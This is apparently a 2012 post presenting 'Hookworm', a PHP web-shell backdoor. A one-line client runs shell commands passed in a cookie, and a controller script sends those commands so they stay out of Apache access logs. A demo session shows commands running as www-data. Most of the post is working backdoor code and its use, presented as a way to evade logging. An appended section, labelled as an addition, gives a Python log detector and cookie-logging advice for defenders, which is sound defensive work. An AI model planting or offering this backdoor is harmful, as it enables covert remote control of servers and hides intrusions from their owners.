PHP backdoor shell: Hookworm
Posted 2012-8-26 20:31:42
Passed via cookies, nothing recorded in the Apache log!

Client:

    <?php if(isset($_COOKIE['wormcmd'])) {echo $_COOKIE['delim'] . shell_exec($_COOKIE['wormcmd']) . $_COOKIE['delim'];}?>

Server side, Hookworm.php:

    <?php
    echo "Enter the IP of the host to connect to:\n";
    $host = trim(fgets(STDIN, 256));
    echo "Host set to $host\n";
    echo "Enter the relative path to the Hookworm (ex: /index.php):\n";
    $file = trim(fgets(STDIN, 256));
    echo "Enter the delimiter you'd like to use (ex: '***')";
    $delim = trim(fgets(STDIN, 256));
    if ($delim == '') $delim = "***"; // delimiter

    while (1) {
            echo "hookworm> ";
            $command = trim(fgets(STDIN, 256));
            if ($command == 'quit' || $command == 'exit') break;
            $out = "GET $file HTTP/1.1\r\n";
            $out .= "Host: $host\r\n";
            $out .= "Connection: Close\r\n";
            $out .= "Cookie: wormcmd=$command; delim=$delim\r\n";
            $out .= "\r\n";
            if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;

            fwrite($fp, $out);
            $str = "";
            //read in a string which is the contents of the required file
            while (!feof($fp)) {
                    $str.=fgets($fp, 512);
            }
            fclose($fp);

            $output_start = strpos($str,$delim)+strlen($delim);
            $output_end = strpos($str,$delim,$output_start);
            $output = substr($str, $output_start, $output_end-$output_start);

            echo $output;
    }
    ?>

Install PHP: apt-get install php5-cli

Upload the client to the website.

Connect:


    root@Dis9Team:/pen/door# php hookworm.php
    Enter the IP of the host to connect to:
    5.5.5.2
    Host set to 5.5.5.2
    Enter the relative path to the Hookworm (ex: /index.php):
    /door2.php
    Enter the delimiter you'd like to use (ex: '***')
    hookworm> id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    hookworm> pwd
    /var/www
    hookworm>

Take a look at the Apache log:

    root@ubuntu:/var/log/apache2# cat access.log  | grep door2.php
    5.5.5.3 - - [10/Aug/2012:13:58:15 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:58:17 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:58:17 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:58:36 +0800] "GET /door2.php HTTP/1.1" 200 293 "http://5.5.5.2/" "Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0"
    5.5.5.3 - - [10/Aug/2012:13:59:28 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:59:29 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:59:30 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:13:59:30 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:14:00:05 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:14:00:07 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
    5.5.5.3 - - [10/Aug/2012:14:00:43 +0800] "GET /door2.php HTTP/1.1" 200 272 "-" "-"
    5.5.5.3 - - [10/Aug/2012:14:00:47 +0800] "GET /door2.php HTTP/1.1" 200 227 "-" "-"
    root@ubuntu:/var/log/apache2#



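Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know weapons.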
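The access log in the post does not show the commands, but it still carries a pattern a defender can search for: one client requesting the same script repeatedly with empty Referer and User-Agent while the response size changes. The following is an added example, not part of the original post; the function name and thresholds are assumptions, the first seven sample lines are copied from the log excerpt in the post, and the last one is constructed.

```python
import re
from collections import defaultdict

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# First seven lines are copied from the post's access.log excerpt;
# the last line is constructed to represent ordinary browser traffic.
SAMPLE_LOG = """\
5.5.5.3 - - [10/Aug/2012:13:58:15 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
5.5.5.3 - - [10/Aug/2012:13:58:17 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
5.5.5.3 - - [10/Aug/2012:13:58:36 +0800] "GET /door2.php HTTP/1.1" 200 293 "http://5.5.5.2/" "Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0"
5.5.5.3 - - [10/Aug/2012:13:59:28 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
5.5.5.3 - - [10/Aug/2012:14:00:05 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
5.5.5.3 - - [10/Aug/2012:14:00:43 +0800] "GET /door2.php HTTP/1.1" 200 272 "-" "-"
5.5.5.3 - - [10/Aug/2012:14:00:47 +0800] "GET /door2.php HTTP/1.1" 200 227 "-" "-"
5.5.5.9 - - [10/Aug/2012:14:01:02 +0800] "GET /index.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0"
"""


def find_headerless_script_hits(lines, min_hits=5, min_sizes=2):
    """Flag (client, path) pairs where a .php path is fetched repeatedly with no
    Referer and no User-Agent while the response size varies between requests."""
    groups = defaultdict(list)
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m or m["status"] != "200":
            continue  # unparsable line or not a successful response
        if not m["path"].split("?")[0].endswith(".php"):
            continue  # only server-side scripts are of interest here
        if m["ref"] == "-" and m["ua"] == "-":
            groups[(m["ip"], m["path"])].append(0 if m["size"] == "-" else int(m["size"]))
    findings = []
    for (ip, path), sizes in sorted(groups.items()):
        # Many hits plus several distinct body sizes suggests output that depends on hidden input.
        if len(sizes) >= min_hits and len(set(sizes)) >= min_sizes:
            findings.append({"ip": ip, "path": path, "hits": len(sizes),
                             "sizes": sorted(set(sizes))})
    return findings


if __name__ == "__main__":
    for finding in find_headerless_script_hits(SAMPLE_LOG.splitlines()):
        print(finding)
```

The default combined format omits cookies, so adding `%{Cookie}i` to the Apache `LogFormat` line is what makes the `wormcmd` value itself visible. Treat such logs as sensitive, since they will also hold session cookies.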
